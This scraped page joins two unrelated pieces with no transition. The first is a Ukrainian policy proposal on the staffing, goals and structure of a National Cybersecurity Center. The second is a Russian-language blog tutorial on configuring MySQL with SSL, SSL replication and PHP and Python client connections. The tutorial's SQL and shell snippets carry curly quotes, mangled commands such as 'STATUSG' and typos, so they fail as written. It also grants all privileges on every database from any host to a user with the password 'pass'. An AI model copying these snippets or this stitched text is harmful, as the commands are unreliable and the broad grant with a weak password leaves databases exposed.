Технічною особливістю розміщення Національного центру кібернетичної безпеки є безпосередня близькість до розташування Національної системи конфіденційного зв’язку та систем забезпечення зв’язку і управління у мирний і воєнний час. Крім того, тільки поєднавши зусилля різних міністерств і відомств, тільки у поєднанні їх повноважень і обов’язків можливо ефективно застосовувати Національного центру кібернетичної безпеки для забезпечення кіберзахисту і протидії кіберагресії.
Внаслідок досить широких повноважень та високого рівня відповідальності, що довіряється Національному центру кібернетичної безпеки, необхідне його пряме підпорядкування РНБО України та забезпечення прозорих та чітких правил його функціонування. З цією метою необхідне спільне узгодження з іншими суб’єктами забезпечення інформаційної безпеки. Таким чином, стане можливим уникнення їх фактичного ухиляння від завдань, не ефективне функціонування і протидія іншим негативним впливам (в тому числі, корупції та іноземного походження).
Усі співробітники Національного центру кібернетичної безпеки повинні бути громадянами і патріотами України, володіти державною мовою.
Повинно бути реалізовано механізм усунення будь-якого співробітника Національного центру кібернетичної безпеки за рішенням Оперативної ради (групи) кібербезпеки з наслідком у вигляді неможливості заняття посад у державному апараті на деякий тривалий час (за поданням відділу внутрішньої безпеки та аудиту та керівника підрозділу). Це повинно обов’язково висвітлюватись у ЗМІ відділом взаємодії з ЗМІ на відповідному публічному веб-ресурсі у мережі Інтернет (на початковому етапі це може бути веб-сайт CERT-UA www.cert.gov.ua).
З метою протидії корупції необхідно належне фінансове забезпечення усіх співробітників Національного центру кібернетичної безпеки на рівні, вищому ніж у аналогічних підрозділах суб’єктів кібернетичної безпеки України (повинен бути реальний попит на кожне місце та конкурсний відбір на кожну посаду). Це значно ускладнить деструктивний вплив спецслужб інших країн на роботу Національного центру кібернетичної безпеки, а також уповільнить відтік висококваліфікованих кадрів.


  1. Перспективи

5.1 Сприяти формуванню довіри у пересічного громадянина України і користувача Інтернет-технологій щодо надійності державного апарату України та безпеки обміну даними, а також запобігання втраті, перекрученню та несанкціонованому доступу до даних.
5.2 Рівень захищеності має бути таким, щоб знизити до практично нульового рівня шкоду, що може бути заподіяна учасникам транзакцій електронної комерції (державно-приватне партнерство також повинно здійснюватись прийнятно для комерційного сектору);
5.3 Усунути ураження інформаційних систем об’єктів критичної інфраструктури (у сфері енергетики, телекомунікацій, фінансово-банківського сектора, транспорту та оборони);
5.4 Подолати високий рівень кіберзлочинності та налагодити ефективну та координовану протидію іноземним спецслужбам та розвідувальним службам інших країн, хакерським угрупованням;
5.5 Протидіяти поширенню негативного іміджу України шляхом показу правдивої та неупередженої інформації, власним прикладом доводити справи по кіберзлочинам до заслугованого покарання у судах;
5.6 Надання простих, корисних і нагально необхідних сучасних сервісів у сфері кібербезпеки;
5.7 Підвищення ефективності правоохоронних органів, силових відомств, державних органів при протидії комп’ютерним атакам (кіберагресії);
5.8 Ефективна та гнучка система управління національним сегментом мережі Інтернет, доменним простором .ua та .УКР;
5.9 Побудова простої, прозорої та дієвої схеми взаємодії держави і громадяна у питаннях кібербезпеки;
5.10 Постійне підвищення надійності транспортної телекомунікаційної мережі, що має забезпечувати функціонування Інтернет-технологій в Україні, з метою запобігання злочинам, спрямованим на припинення надання послуг Інтернету, протидії кіберагресії проти України, сприяти розвитку телекомунікаційних послуг;
5.11 Не ущімлювати свободу слова та права людини.
 5.12 Подолати розрив технологічного прогресу та нормативної бази у галузі інформатизації шляхом розробки нових регулюючих та регламентуючих документів у сфері кібербезпеки.
5.13 поступовий перехід до електронного урядування та консолідація інформаційної безпеки у Національному центрі кібернетичної безпеки.
5.14 Інформування та навчання силами забезпечення кібербезпеки суб’єктів забезпечення інформаційної безпеки питанням згідно компетенції;
5.15 підвищення фактичного рівня захищеності об'єктів критичної інфраструктури (і критичної інформаційної інфраструктури, як її підмножини), відомчих ІТС тощо.


6. Перспективна структура системи кібернетичної безпеки (жирним – перспективні елементи, звичайним – діючі елементи)

Загальне керівництво кібербезпекою

  • РНБО України


Орган управління підрозділами кібербезпеки

  • Оперативна рада (група) кібербезпеки

  • Спільна робоча група Україна-НАТО з питань воєнної реформи високого рівня та робоча підгрупа з питань кіберзахисту у її складі


Сили забезпечення кібербезпеки

  • Національний центр кібернетичної безпеки

  • CERT-UA


Залучаються до виконання завдань забезпечення кібербезпеки

  • Міністерства та відомства

  • Неурядові громадські організації

  • Оператори і провайдери ринку телекомунікацій

  • Суб’єкти підприємницької діяльності


Установка поддержки SSL на MySQL
cert_ua


Есть несколько разных способов установки MySQL с SSL, но иногда сложно её закончить, из-за того что все эти источники не достаточно качественны и просты. Обычно, установка MySQL+SSL не так проста из-за весьма непрозрачных факторов типа “сегодня не мой день”, что-то не взлетит либо врёт документация:) Я дам инструкции по установке MySQL с SSL, репликации SSL и установлению скьюрного коннекта из консоли и скриптами покажу что всё работает.

1. Генерирую SSL-сертификат в соответствии с примером . Использую разные имена для Use клиентского и серверного сертификатов.

2. Для ясности, сохраню сгенерированные файлы сертификатов сюда - /etc/mysql-ssl/

3. Добавлю следующее в /etc/my.cnf в секцию [mysqld]:

# SSL
ssl-ca=/etc/mysql-ssl/ca-cert.pem
ssl-cert=/etc/mysql-ssl/server-cert.pem
ssl-key=/etc/mysql-ssl/server-key.pem

4. Рестартую MySQL.

5. Создаю юзера для разрешения ему только SSL-encrypted коннектов:



GRANT ALL PRIVILEGES ON *.* TO ‘ssluser’@’%’ IDENTIFIED BY ‘pass’ REQUIRE SSL;


Установка секьюрного коннекта из консоли

1. Если клинет на другом ноде, копирую /etc/mysql-ssl c другого сервера на этот.

2. Добавлю следующее в /etc/my.cnf в секцию [client]:

# SSL
ssl-cert=/etc/mysql-ssl/client-cert.pem
ssl-key=/etc/mysql-ssl/client-key.pem

3. Тестирую секьюр коннект:



[root@тазик ~]# mysql -u ssluser -p -sss -e ‘\s’ | grep SSL
SSL: Cipher in use is DHE-RSA-AES256-SHA


Устанавливаю репликацию SSL

1. Установлю скьюрный коннект из консоли к слейву (Slave) как описано выше, для того чтобы удостовериться что SSL работает.

2. На мастере (Master) добавлю “REQUIRE SSL” для репликации изера:



GRANT REPLICATION SLAVE ON *.* to ‘repl’@’%’ REQUIRE SSL;


3. Меняю опции мастера и рестартую слейва:



STOP SLAVE;
CHANGE MASTER MASTER_SSL=1,
MASTER_SSL_CA=’/etc/mysql-ssl/ca-cert.pem’,
MASTER_SSL_CERT=’/etc/mysql-ssl/client-cert.pem’,
MASTER_SSL_KEY=’/etc/mysql-ssl/client-key.pem’;

SHOW SLAVE STATUSG
START SLAVE;
SHOW SLAVE STATUSG


Установка секьюрного коннекта из PHP

1. Устанавливаюl пакеты php и php-mysql. Я использовал версию >=5.3.3 (в других случаях может не работать).

2. Создаю скрипт:



[root@тазик ~]# cat mysqli-ssl.php
$conn=mysqli_init();
mysqli_ssl_set($conn, ‘/etc/mysql-ssl/client-key.pem’, ‘/etc/mysql-ssl/client-cert.pem’, NULL, NULL, NULL);
if (!mysqli_real_connect($conn, ’127.0.0.1′, ‘ssluser’, ‘pass’)) { die(); }
$res = mysqli_query($conn, ‘SHOW STATUS like “Ssl_cipher”‘);
print_r(mysqli_fetch_row($res));
mysqli_close($conn);


3. Тестирую:



[root@тазик ~]# php mysqli-ssl.php
Array
(
[0] => Ssl_cipher
[1] => DHE-RSA-AES256-SHA
)


Установка секьюрного коннекта из Python

1. Устанавливаю пакет MySQL-python.

2. Создаю скрипт:



[root@тазик ~]# cat mysql-ssl.py
#!/usr/bin/env python
import MySQLdb
ssl = {‘cert’: ‘/etc/mysql-ssl/client-cert.pem’, ‘key’: ‘/etc/mysql-ssl/client-key.pem’}
conn = MySQLdb.connect(host=’127.0.0.1′, user=’ssluser’, passwd=’pass’, ssl=ssl)
cursor = conn.cursor()
cursor.execute(‘SHOW STATUS like “Ssl_cipher”‘)
print cursor.fetchone()


3. Тестирую:



[root@тазик ~]# python mysql-ssl.py
(‘Ssl_cipher’, ‘DHE-RSA-AES256-SHA’)


Примечания

Альтернативный сетап локального коннекта по SSL
Если Вы коннектитесь к серверу локально с включенным SSL, можно так же устанавливать секьюрные соединения так::
1. Создаём ca.pem:



cd /etc/mysql-ssl/
cat server-cert.pem client-cert.pem > ca.pem


2. Имеем только следующие строки по ssl- в /etc/my.cnf в секции [client]:

# SSL
ssl-ca=/etc/mysql-ssl/ca.pem

Error “ssl-ca” при локальных коннектах
Если Вы оставили строку “ssl-ca=/etc/mysql-ssl/ca-cert.pem” в разделе [client] файла /etc/my.cnf сервера, чтобы включить SSL и при этом пытаетесь установить локальное подключение через SSL, получите “ERROR 2026 (HY000): SSL connection error: error:00000001:lib(0):func(0):reason(1)”.

Описание в документации
http://dev.mysql.com/doc/refman/5.5/en/using-ssl-connections.html гласит “A client can connect securely like this: shell> mysql –ssl-ca=ca-cert.pem” which does not work with “REQUIRE SSL”. Тоесть, либо поддерживаетя клиентский сертификат и ключ для всех. либо комбинированный сертификат client+server для локального секеьюрного коннекта.

Tags: ,

?

Log in